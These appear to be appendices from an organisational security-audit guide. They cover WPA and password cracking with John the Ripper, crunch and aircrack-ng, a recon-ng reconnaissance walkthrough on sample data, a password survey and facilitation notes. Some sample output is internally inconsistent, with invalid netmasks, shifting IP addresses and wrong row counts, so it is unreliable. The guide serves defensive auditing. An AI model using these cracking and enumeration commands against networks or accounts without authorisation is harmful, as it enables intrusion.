JtR is a powerful tool you can use in combination of existing wordlists, but it also can add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions - a base set is included with JtR, but a much more powerful set is added by [KoreLogic] (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set "chr file" that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode . This PDF presentation has a good walkthrough of how John and Kore's rules work

Additional guides: * (http://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux)

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, you can remove "KoreLogicRules". BackReference provides a great example of rules usage.

Some particularly useful ones individual rulesets are: * AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation) * AddJustNumbers (adds 1-4 digits to the end of everything) * l33t (leet-speek combinations)

There are some build-in combinations of rulesets - for example, just --rules runs john's internal collection of default rules, and --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one word dictionary creates a list of 6,327,540 permutations on just that word.

Brute force, using John and crunch

JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.

Recommendations

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work.

Specifically for wireless passwords, choosing a strong WPA key is one of the most ild not mportant steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Sample Practice

For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

Resources

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation about how improving the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi , but is using very out of date numbers - consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F"

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

APPENDIX: Password Survey

Password Survey

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

To how many people have you given your current password?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

In which positions in your password are the symbols?

Have you written down your current password?

If you wrote down your current password how is it protected (choose all that apply) ?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

APPENDIX: Recon-ng walkthrough

Installing Recon-ng

For full instructions, see the Recon-ng Getting Started Instructions

Using Recon-ng

NOTE: This guide is based upon the data flow documentation from the Recon-ng website

By pressing tab twice you can use auto-completion.

[recon-ng][default] >
add         exit        load        record      search      show        use
back        help        pdb         reload      set         spool       workspaces
del         keys        query       resource    shell       unset 

This works even in commands.

[recon-ng][default] > show
banner           credentials      hosts            locations        options          schema
companies        dashboard        keys             modules          ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         workspaces

Using recon modules

The recon modules are named in a very specific fashion to help the user understand the flow of data inside the tool. Modules use the syntax <methodology step>/<input table>-<output table>/<module>. The inputs are the first part of each module, and the outputs are the second part. The module name itself is the tool used to process the data. So, recon/domains-hosts/brute-hosts takes domain names (websitename.org) as an input, and outputs hostnames (extranet.websitename.org, etc.). If you provide the name of the specific module, recon-ng can figure it out (though tab completion doesn't help) -- for example, use breachalarm works just as well as use recon/contacts-creds/breachalarm

You can also search modules by their inputs or outputs. search domains- displays all modules that take domain names as their input, and search -contacts displays all modules that outputs contact information.

Preparing

Set verboseness on during the guide so that you can see everything that happens. (recommended to begin with)

[recon-ng][default] > set VERBOSE True

You can use auto completion to see all the possible keys you can add.

[recon-ng][websitename] > keys add
bing_api           facebook_secret    google_cse         jigsaw_username    pwnedlist_iv       twitter_api
builtwith_api      facebook_username  ipinfodb_api       linkedin_api       pwnedlist_secret   twitter_secret
facebook_api       flickr_api         jigsaw_api         linkedin_secret    shodan_api         virustotal_api
facebook_password  google_api         jigsaw_password    pwnedlist_api      sonar_api

Choose and add a key.

[recon-ng][default] > keys add bing_api TYPE_THE_KEY_VALUE_HERE
[*] Key 'bing_api' added.

You can list keys by using the command keys list

[recon-ng][default] > keys list

  +--------------------------------------------------------------------------------------+
  |        Name       |                              Value                               |
  +--------------------------------------------------------------------------------------+
  | bing_api          | W7AgqE2Zv9ZIxqMzhObF                                             |
  | builtwith_api     | 74797dd40f0157d7f2bef45f2c5f907a                                 |
  | facebook_api      |                                                                  |
  | facebook_password |                                                                  |
  | facebook_secret   |                                                                  |
  | facebook_username |                                                                  |
  | flickr_api        |                                                                  |
  | google_api        | ab997f70cd67c77de1fba7007ca6401f                                 |
  | google_cse        |                                                                  |
  | ipinfodb_api      | d047b271ffa9277a6b717ee7ded757d7                                 |
  | jigsaw_api        |                                                                  |
  | jigsaw_password   |                                                                  |
  | jigsaw_username   |                                                                  |
  | linkedin_api      |                                                                  |
  | linkedin_secret   |                                                                  |
  | pwnedlist_api     |                                                                  |
  | pwnedlist_iv      |                                                                  |
  | pwnedlist_secret  |                                                                  |
  | shodan_api        | 107ebcb9577779a7ee77212a6291eb67                                 |
  | sonar_api         |                                                                  |
  | twitter_api       | cf556fc775cf577c267b7c104c475097                                 |
  | twitter_secret    | fa0e557575455e1705ad719eee76c064                                 |
  | virustotal_api    | edecc7250f0717b2f7065a2cabbc47bf                                 |
  +--------------------------------------------------------------------------------------+

Reference the Creating API Keys Section below for quick links to setting up popular APIs.

NOTE: Sample Keys - working keys may have different lengths than the randomly generated numbers in this example.

First steps

NOTE: This walkthrough is using sample data. Results will vary widely depending on the organization you are working with.


[recon-ng][default] > workspaces add websitename
[recon-ng][websitename] > 
[recon-ng][websitename] > workspaces select default
[recon-ng][default] >
[recon-ng][default] > workspaces select websitename
[recon-ng][websitename] > 

Display possible seed information by using auto-completion.

[recon-ng][default] > add
companies        credentials      hosts            locations        ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         

We will only use the organization's name, one domain, two netblocks (that we got by searching for other domains and ping-ing them), and two e-mails of the company we are looking for so we will add those.

First, add the company name.

[recon-ng][websitename] > add companies
company (TEXT): Websitename
description (TEXT): 

Next, add the domain.

[recon-ng][default] > add domains websitename.org
[recon-ng][websitename] > show domains

  +--------------------------------+
  | rowid |     domain    | module |
  +--------------------------------+
  | 1     | websitename.org | base   |
  +--------------------------------+

[*] 1 rows returned

Next, add my contacts. we don't know much. But, we will add what we know.

[recon-ng][websitename] > add contacts
first_name (TEXT): Bob
middle_name (TEXT):
last_name (TEXT): Smith
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > add contacts
first_name (TEXT): Carl
middle_name (TEXT):
last_name (TEXT): Johnson
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > 

Finally we will add the ip address of their website.

[recon-ng][websitename] > add netblocks
netblock (TEXT): 174.154.167.69
[recon-ng][websitename] > add netblocks
netblock (TEXT): 96.127.170.121

Here it is in the database.

[recon-ng][websitename][shodan_net] > show netblocks

  +---------------------------------+
  | rowid |    netblock    | module |
  +---------------------------------+
  | 2     | 174.154.167.69 | base   |
  | 3     | 96.127.170.121 | base   |
  +---------------------------------+
Reconnaisance phase (netblocks example)

First, search for any modules that use netblocks as an input.

recon-ng][websitename] > search netblocks-
[*] Searching for 'netblocks-'...

  Recon
  -----
    recon/netblocks-hosts/reverse_resolve
    recon/netblocks-hosts/shodan_net
    recon/netblocks-ports/census_2012

In the case of recon/netblocks-hosts/shodan_net we can see that the "shodan_net" module is a reconnaissance module that takes in netblocks and produces hosts.

Lets try it out...

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > 

An empty command line can be daunting. If you are ever stuck on what current commands you can use the help command to see the current commands.

[recon-ng][websitename][shodan_net] > help

Commands (type [help|?] <topic>):
---------------------------------
add             Adds records to the database
back            Exits the current context
del             Deletes records from the database
exit            Exits the framework
help            Displays this menu
keys            Manages framework API keys
load            Loads selected module
pdb             Starts a Python Debugger session
query           Queries the database
record          Records commands to a resource file
resource        Executes commands from a resource file
run             Runs the module
search          Searches available modules
set             Sets module options
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file
unset           Unsets module options
use             Loads selected module

Use the show info command to learn about the module and see what options are available.

[recon-ng][websitename][shodan_net] > show info

      Name: Shodan Network Enumerator
      Path: modules/recon/netblocks-hosts/shodan_net.py
    Author: Mike Siegel and Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from the Shodanhq.com API by using the 'net' search operator. Updates the 'hosts'
  table with the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   1              yes       limit number of api requests per input source (0 = unlimited)
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default        SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL ORDER BY netblock
  <string>       string representing a single input
  <path>         path to a file containing a list of inputs
  query <sql>    database query returning one column of inputs

[recon-ng][websitename][shodan_net] > 

It pulls directly from the netblocks source that we set up. Now, use run to run the module .

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > run

--------------
174.154.167.69
--------------
[*] Searching Shodan API for: net:174.154.167.69
[*] 174.154.167.69 (vps.websitename.org) - 7706
[*] 174.154.167.69 (vps.websitename.org) - 110
[*] 174.154.167.69 (vps.websitename.org) - 57
[*] 174.154.167.69 (vps.websitename.org) - 22
[*] 174.154.167.69 (vps.websitename.org) - 147
[*] 174.154.167.69 (vps.websitename.org) - 997
[*] 174.154.167.69 (vps.websitename.org) - 70
[*] 174.154.167.69 (vps.websitename.org) - 25

--------------
96.127.170.121
--------------
[*] Searching Shodan API for: net:96.127.170.121
[*] 96.127.170.121 (vps.websitename.org) - 7706
[*] 96.127.170.121 (vps.websitename.org) - 22
[*] 96.127.170.121 (vps.websitename.org) - 465
[*] 96.127.170.121 (vps.websitename.org) - 997
[*] 96.127.170.121 (vps.websitename.org) - 25
[*] 96.127.170.121 (vps.websitename.org) - 995
[*] 96.127.170.121 (vps.websitename.org) - 57
[*] 96.127.170.121 (vps.websitename.org) - 147
[*] 96.127.170.121 (vps.websitename.org) - 110
[*] 96.127.170.121 (vps.leillc.net) - 7070

-------
SUMMARY
-------
[*] 17 total (2 new) items found.

Since it promised me hosts, we will see what hosts it uncovered.

[recon-ng][websitename][shodan_net] > show hosts

  +---------------------------------------------------------------------------------------------------+
  | rowid |        host       |   ip_address   | region | country | latitude | longitude |   module   |
  +---------------------------------------------------------------------------------------------------+
  | 1     | vps.websitename.org | 174.154.167.69 |      |         |          |           | shodan_net |
  | 2     | vps.websitename.org | 96.127.170.121 |      |         |          |           | shodan_net |
  | 3     | vps.leillc.net    | 96.127.170.121 |        |         |          |           | shodan_net |
  +---------------------------------------------------------------------------------------------------+

[*] 3 rows returned

It seems the website leillc.net is obviously not associated with the company I am doing recon on. Since this module has finished, we will leave it using the back command.

[recon-ng][websitename][shodan_net] > back
[recon-ng][websitename] > 

Now we will use the other two netblock- modules. We will show one more and then skip the second.

First we find all the possible modules using tab completion.

[recon-ng][websitename] > use recon/netblocks-
recon/netblocks-hosts/reverse_resolve  recon/netblocks-hosts/shodan_net       recon/netblocks-ports/census_2012
[recon-ng][websitename] > use recon/netblocks-

We are going to use reverse-resolve.

[recon-ng][websitename][census_2012] > use recon/netblocks-hosts/reverse_resolve

But, when we run it we get an error!

[recon-ng][websitename][reverse_resolve] > run

--------------
174.154.167.69
--------------
[!] Need more than 1 value to unpack.

OPTIONAL: To figure out what was going on, go back and then set DEBUG True to see the underlying error. The debug error message lets us know that we need to use full netmask syntax for netblocks. We will now add new netblocks in the correct format and then delete the old ones.

First we will add them correctly.

[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 177.154.167.69/72
[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 96.127.170.121/72

Now we have double of the same netblocks

[recon-ng][websitename][reverse_resolve] > show netblocks

  +---------------------------------------------+
  | rowid |      netblock     |      module     |
  +---------------------------------------------+
  | 2     | 174.154.167.69    | base            |
  | 4     | 177.154.167.69/72 | reverse_resolve |
  | 3     | 96.127.170.121    | base            |
  | 5     | 96.127.170.121/72 | reverse_resolve |
  +---------------------------------------------+

[*] 4 rows returned

Now that we know their rowid numbers, I can delete them.

[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 2
[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 3

And, re-running the module now works.

[recon-ng][websitename][reverse_resolve] > run

-----------------
177.154.167.69/72
-----------------
[*] 177.154.167.69 => dsl-177-154-167-69-dyn.prod-infinitum.com.mx

-----------------
96.127.170.121/72
-----------------
[*] 96.127.170.121 => vps.websitename.org

-------
SUMMARY
-------
[*] 2 total (1 new) items found.

Now, exploring these hosts we realize quickly that most the new hosts on other domains are not associated with the company. Hence, we will remove them.

[recon-ng][websitename] > show hosts

  +-----------------------------------------------------------------------------------------------------------------------------------+
  | rowid |                     host                     |   ip_address   | region | country | latitude | longitude |      module     |
  +-----------------------------------------------------------------------------------------------------------------------------------+
  | 4     | dsl-177-154-167-69-dyn.prod-infinitum.com.mx | 177.154.167.69 |        |         |          |           | reverse_resolve |
  | 1     | vps.websitename.org                          | 174.154.167.69 |        |         |          |           | shodan_net      |
  | 2     | vps.websitename.org                          | 96.127.170.121 |        |         |          |           | shodan_net      |
  | 7     | vps.pineapplebob.net                         | 96.127.170.121 |        |         |          |           | shodan_net      |
  +-----------------------------------------------------------------------------------------------------------------------------------+

[*] 4 rows returned
[recon-ng][websitename] > del hosts
rowid(s) (INT): 4
[recon-ng][websitename] > del hosts
rowid(s) (INT): 7

We skip the last module recon/netblocks-ports/census_2012 since you already get the idea.

Sadly, none of the new domains were actually useful.

Let's find new domains using brute forcing. First we should look for what is available.

[recon-ng][websitename] > search domains-domains
[*] Searching for 'domains-domains'...

  Recon
  -----
    recon/domains-domains/brute_suffix
[recon-ng][websitename] > use recon/domains-domains/brute_suffix
[recon-ng][websitename][brute_suffix] > run

-------------
WEBSITENAME.ORG
-------------
[*] websitename.ac => No record found.
[*] websitename.academy => No record found.
[*] websitename.ad => No record found.
[*] websitename.ae => No record found.
[*] websitename.aero => No record found.
[*] websitename.af => (SOA) websitename.af - Host found!
[*] websitename.ag => No record found.
[*] websitename.ai => No record found.
[*] websitename.al => No record found.
[*] websitename.am => (SOA) websitename.am - Host found!
[*] websitename.an => No record found.
[*] websitename.ao => No record found.
[*] websitename.aq => (SOA) websitename.aq - Host found!
[*] websitename.ar => No record found.
[*] websitename.arpa => No record found.
[*] websitename.as => No record found.
[*] websitename.asia => No record found.
[*] websitename.at => No record found.
[*] websitename.au => No record found.
[*] websitename.aw => (SOA) websitename.aw - Host found!
[*] websitename.ax => No record found.
[*] websitename.az => No record found.
[*] websitename.ba => No record found.
[*] websitename.bb => No record found.
[*] websitename.bd => No record found.
[*] websitename.be => No record found.
[*] websitename.berlin =>  (SOA) websitename.berlin - Host found!
...
...

This returned quite a few domains. We have removed the middle section

[recon-ng][websitename][brute_suffix] > show domains

  +------------------------------------------+
  | rowid |       domain      |    module    |
  +------------------------------------------+
  | 2     | websitename.af      | brute_suffix |
  | 7     | websitename.am      | brute_suffix |
  | 4     | websitename.asia    | brute_suffix |
  | 5     | websitename.aq      | brute_suffix |
  | 7     | websitename.bg      | brute_suffix |
             ....
             ....
             ....
  | 25    | websitename.net     | brute_suffix |
  | 1     | websitename.org     | base         |
  | 17    | websitename.uz      | brute_suffix |
  +------------------------------------------+

Many out of scope domains had to be removed, but luckily you can specify ranges when you delete.

[recon-ng][websitename][brute_suffix] > del domains
rowid(s) (INT): 72-44

There are a lot of these, so we will only run one since there is little to nothing new to learn here.

[recon-ng][websitename][brute_suffix] > use recon/domains-hosts/baidu_site
[recon-ng][websitename][baidu_site] > run

------------
WEBSITENAME.EU
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.eu
[*] www.websitename.eu
[*] Sleeping to avoid lockout...

------------
WEBSITENAME.FR
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.fr

-------------
WEBSITENAME.ORG
-------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org
[*] www.websitename.org
[*] things.websitename.org
[*] Sleeping to avoid lockout...

----------------
WEBSITENAME.ORG.UK
----------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org.uk

------------
WEBSITENAME.COM
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.com
[*] www.websitename.com
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 5 total (2 new) items found.
[recon-ng][websitename][baidu_site] > use recon/domains-hosts/brute_hosts
[recon-ng][websitename][brute_hosts] > run

-------------
WEBSITENAME.ORG
-------------
[*] No Wildcard DNS entry found.
[*] 0.websitename.org => No record found.
[*] 01.websitename.org => No record found.
[*] 02.websitename.org => No record found.
[*] 03.websitename.org => No record found.
[*] 1.websitename.org => No record found.
[*] 10.websitename.org => No record found.
[*] 11.websitename.org => No record found.
[*] 12.websitename.org => No record found.
[*] 13.websitename.org => No record found.
[*] 14.websitename.org => No record found.
[*] 15.websitename.org => No record found.
[*] 16.websitename.org => No record found.
[*] 17.websitename.org => No record found.
[*] 18.websitename.org => No record found.
[*] 19.websitename.org => No record found.
[*] 2.websitename.org => No record found.
[*] 20.websitename.org => No record found.
[*] 3.websitename.org => No record found.
[*] 3com.websitename.org => No record found.
[*] 4.websitename.org => No record found.
[*] 5.websitename.org => No record found.
[*] 6.websitename.org => No record found.
...
...
[*] autodiscover.websitename.org => (CNAME) autodiscover.websitename-mail.org - Host found!
[*] autodiscover.websitename.org => (A) autodiscover.websitename.org - Host found!
[*] autorun.websitename.org => No record found.
[*] av.websitename.org => No record found.
...
...
[recon-ng][websitename] > show hosts

  +------------------------------------------------------------------------------------------------------------------+
  | rowid |               host              |   ip_address   | region | country | latitude | longitude |    module   |
  +------------------------------------------------------------------------------------------------------------------+
  | 8     | autodiscover.websitename-mail.org |                |        |         |          |           | brute_hosts |
  | 9     | autodiscover.websitename.org      |                |        |         |          |           | brute_hosts |
  | 32    | autodiscover.websitename.com       |                |        |         |          |           | brute_hosts |
  | 10    | conference.websitename.org        |                |        |         |          |           | brute_hosts |
  | 12    | beta.websitename.org              |                |        |         |          |           | brute_hosts |
  | 5     | demo.websitename.org            |                |        |         |          |           | baidu_site  |
  | 14    | email.websitename.org             |                |        |         |          |           | brute_hosts |
  | 15    | intranet.websitename.org               |                |        |         |          |           | brute_hosts |
  | 16    | ftp.websitename.org               |                |        |         |          |           | brute_hosts |
  | 37    | ftp.websitename.com                |                |        |         |          |           | brute_hosts |
  | 13    | ftp2.websitename.org              |                |        |         |          |           | brute_hosts |
  | 11    | websitename.github.com            |                |        |         |          |           | brute_hosts |
  | 24    | websitename.org                   |                |        |         |          |           | brute_hosts |
  | 75    | websitename.com                    |                |        |         |          |           | brute_hosts |
  | 18    | localhost.websitename.org         |                |        |         |          |           | brute_hosts |
  | 19    | mail.websitename.org              |                |        |         |          |           | brute_hosts |
  | 36    | mail.websitename.com               |                |        |         |          |           | brute_hosts |
  | 20    | ns1.websitename.org               |                |        |         |          |           | brute_hosts |
  | 27    | temp.websitename.org              |                |        |         |          |           | brute_hosts |
  | 25    | test.websitename.org              |                |        |         |          |           | brute_hosts |
  | 1     | vps.websitename.org               | 174.174.177.77 |        |         |          |           | shodan_net  |
  | 2     | vps.websitename.org               | 77.127.170.121 |        |         |          |           | shodan_net  |
  | 27    | webmail.websitename.com            |                |        |         |          |           | brute_hosts |
  | 4     | www.websitename.org               |                |        |         |          |           | baidu_site  |
  | 7     | www.websitename.com                |                |        |         |          |           | baidu_site  |
  +------------------------------------------------------------------------------------------------------------------+

[*] 77 rows returned

NOTE: Many host gathering modules use other hosts as a starting place. It is important to sanitize the hosts database between modules to make sure that you do start enumerating based upon incorrectly added hosts.

TODO WHY?

[recon-ng][websitename][census_2012] > query select hosts.ip_address, hosts.host, ports.host, ports.port from hosts join ports using (ip_address)

  +----------------------------------------------------------------------+
  |   ip_address   |           host           |        host       | port |
  +----------------------------------------------------------------------+
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 110  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 147  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 22   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 27   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 477  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 77   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 110  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 147  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 22   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 27   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 7707 |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 477  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 77   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 110  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 147  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 22   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 27   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 7707 |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 77   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 70   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 777  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 110  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 147  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 22   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 27   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 7707 |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 77   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 70   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 777  |
  +----------------------------------------------------------------------+
Reconnaisance: Next Steps
Reporting
[recon-ng][websitename] > use reporting/csv
[recon-ng][websitename][csv] >
[recon-ng][websitename][csv] > set TABLE Domains
TABLE => Domains
[recon-ng][websitename][csv] > set FILENAME /home/computer/.recon-ng/workspaces/websitename/Domains.csv
FILENAME => /home/computer/.recon-ng/workspaces/websitename/Domains.csv
[recon-ng][websitename][csv] > run
[*] 5 records added to '/home/computer/.recon-ng/workspaces/websitename/Domains.csv'.

Creating API Keys

APPENDIX: Device Assessment Checklist

Device Assessment Checklist

OSX
Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 8

Installed updates

Control Panel Programs and features installed updates CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

Windows XP

Linux

APPENDIX: Remote Facilitation

Remote Facilitation

Summary

This component suggests approaches to use if in-person facilitation is not possible, and to include participation from remote staff or offices when an organization has multiple locations. This supplements the Data Assessment, Process Mapping, and Threat Assessment exercises, enabling them to be conducted remotely.

This may not provide as deep results as in-person facilitation, but should provide adequate levels of expansion and verification of information needed, and even provide the secondary benefits in most cases of helping the organization build a shared understanding of its processes, risks, and riosk tolerances.

Overview

There are four different approaches you can use, depending on what resources are available, the size and structure of the organization, and which activities you are trying to facilitate remotely. Is there someone that can help as an on-site facilitator? Are video conferences realistic (given bandwidth and cost)? How does the approach you use interact with existing organizational team structures?

Materials Needed
Considerations
Walkthrough

Selecting the most suitable approach requires understanding of the capacity and personel structure of the organization, including their ability to support communication technologies, and the availability of someone that can assist in facilitation.

After selecting the most suitable approach, auditor should make sure to prepare for remote facilitation:

Approach 1, on-site facilitator, with video chat auditor

Suitable when there is a person that can take a facilitation role on-site. Facilitator does not have to be a technical person, but should be able to manage the session, making sure that it is as inclusive and as productive as possible. Accommodates more participants than Approach 3 per session. If the auditor is able to join remotely, this provides an ideal substitute.

Approach 2, hybrid online/synchronous

Can be used with large group of participants, where it is possible to meet over multiple sessions with enough time to collect and analyse responses in between.

Approach 3, multiple small sessions

Suitable for medium to large groups where it is possible to conduct multiple small video chats. It is recommended for sessions to be arranged to include people from the same organizational level, but different functions/teams/arms/departments of the organization. This approach scales to larger organizations and helps ensure voices at different levels of the organization are heard.

Approach 4, hybrid offline/asynchronous

Sample Questions: Data Mapping

Footnotes
